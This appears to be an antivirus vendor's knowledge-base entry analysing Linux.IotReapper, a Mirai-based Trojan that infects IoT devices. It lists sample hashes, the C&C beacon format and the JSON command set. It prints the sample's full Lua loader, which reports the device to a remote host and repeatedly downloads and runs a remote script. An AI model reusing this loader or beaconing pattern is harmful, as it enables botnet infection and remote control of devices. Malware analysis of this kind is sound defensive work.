病毒知识库

分析不法分子使用的技术可以使我们预测其可能的发展方向，以便更加有效地抵御今后可能遇到的威胁。您也可以了解一下恶意程序如何在被感染的系统中运行以及如何抵御这些程序。

Linux.IotReapper in virus library:

SHA1:

cd078ef54430c9ef9aa24dfbb7c89456f13e86f6
8f40a00effdc150d15f7a49ce7c72efc5fc364d9

A Trojan that infects IoT Linux devices. It is a modified version of Linux.Mirai.

Instead of brute-forcing logins and passwords to hack devices, Linux.IotReapper launches exploits (at the present moment it uses 10 exploits) and checks the result of their execution. If a device is vulnerable, it uses the GET request to send to its command and control (C&C) server the following structure:

struct
{
  char host[40];
  char port[10];
  char user[30];
  char password[40];
  char gw_name[30];
  char device_id[30];
} DeviceInfo

where device_id — a unique identifier of the infected device.

Periodically, it sends to the C&C servers the following requests:

/rx/hx.php?mac=52-54-00-12-34-56&&port=3000&type=etag&ver=1.07&act=finish

where the values of the act parameter are exit code system call, or finish, if there is no launched files.

The Trojan obtains commands from the C&C server in the JSON format. It processes the following commands:

key	value
state	0 or 1
code	run — download and run, down — only download
ip	source for downloading
name	name of the file saved to the /tmp/ folder
md5	its md5
port	http port
path	url to a file
runtype
runport

The Trojan downloads from the remote server a module of the Lua interpreter for the architectures ARM and MIPS. The module contains the following code in the Lua language:


local sock = require("socket")
local http = require("socket.http")
local ltn12 = require("ltn12")
 
local lua_url = "***http://***.com:8080/run.lua"
local tj_url = "http://bbk80.com/api/api.php"
 
local request_body = "macaddress=" .. DEVICE_MAC .. "&device=TP-Link775" .. "&type=armv5le&version=" .. VERSION
local if_modified_since = nil;
 
function http.get(u)
    local t = {}
    local headers = {
    }
 
    if if_modified_since ~= "" then
        headers = {
            ["If-Modified-Since"] = if_modified_since
        }
    end
    local r, c, h = http.request{
        headers = headers,
        url = u,
        sink = ltn12.sink.table(t)
    }
 
     
    if c == 200 then
        if_modified_since = h["date"]
    end
    return r, c, h, table.concat(t)   
end
 
 
http.request(tj_url,request_body)
local r,code,header,body=http.get(lua_url)
while true do
    if code == 200 then
        attack(body)
        print("Download Succeed")
    elseif code == 304 then
        --print("Download Not Modified")
    else
        print("Download Failed:" .. code)
    end
    sock.sleep(5 * 60)
    r,code,header,body=http.get(lua_url)
    http.request(tj_url,request_body)
    collectgarbage("collect")
end

This module can currently download and launch a script that looks the following way:


print("Just Test")

The functions of the Trojan allow to receive links, download a file from them and launch it. However, attempts to obtain active links were unsuccessful during the research of the sample.